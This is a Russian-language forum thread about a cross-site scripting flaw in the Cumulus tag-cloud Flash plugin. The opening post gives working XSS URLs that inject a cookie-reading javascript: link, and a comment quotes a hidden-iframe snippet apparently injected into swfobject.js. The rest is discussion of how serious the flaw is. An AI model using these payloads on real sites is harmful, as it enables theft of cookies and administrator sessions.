вот пример pt:
http://SITE.ru/modules/cumulus/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27java%20script:%20alert%28document.cookie%29%27+style=%27font-size:+50pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
Второй пример:
http://SITE.RU/modules/cumulus/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27http://SITE2.ru%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
Кто что думает???? Этим плагином ного сайтов поломали.
Комментарии
Ну что думаем: Это печально...
Только это уязвимость не модуля, а самой флешки
Жалко ... Хорошая крутилка ):
Прям день находок... Проверяйте свои swfobject.js
document.write('<iframe name="buffer" src="about:blank" style="width:0px; height:0px; overflow:hidden; border:none;"></iframe>');setTimeout(second_passed, 1000);
как хорошо, что я этой ерундой не пользуюсь
ну правда, какой смысл в этой круговерти тегов.
это как яваскриптная анимация на сайтах на народе 10 лет назад
Очень удобно и компактно и красиво ... Хороший плагин... был
Сих - нифига - это просто индикатор того, что есть дырка. Т.е. выполнить можно нехорошую бяку
XSS-атаку, сопрут твой админский доступ проще говоря, хотя может не только твой
Это даже ты сможешь сделать
+1 придать анафеме кумулус. Много умов он тревожит, это печально
чтобы таким образом что то ломать, атакующий должен иметь права на размещение флеша в материале куда атакуемый может зайти.
мало того. атакуемый должен еще произветис клик.
так что простите это не атака. а лохотрон на админа.
Знаете, мне как-то по барабану на кого этот лохотрон. Просто одна мысль о том, что кто-то будет на моем сайте лохотронить мне не по душе ... ну а в целом дело житейское
простите у вас на сайте разрешено аплоадить флеш и тем более его размещать в материалах?
эта глупость сродни разрешению фильтра full html всем пользователям.
Да просто даже повода давать не хочется
выключите компьютер
+100500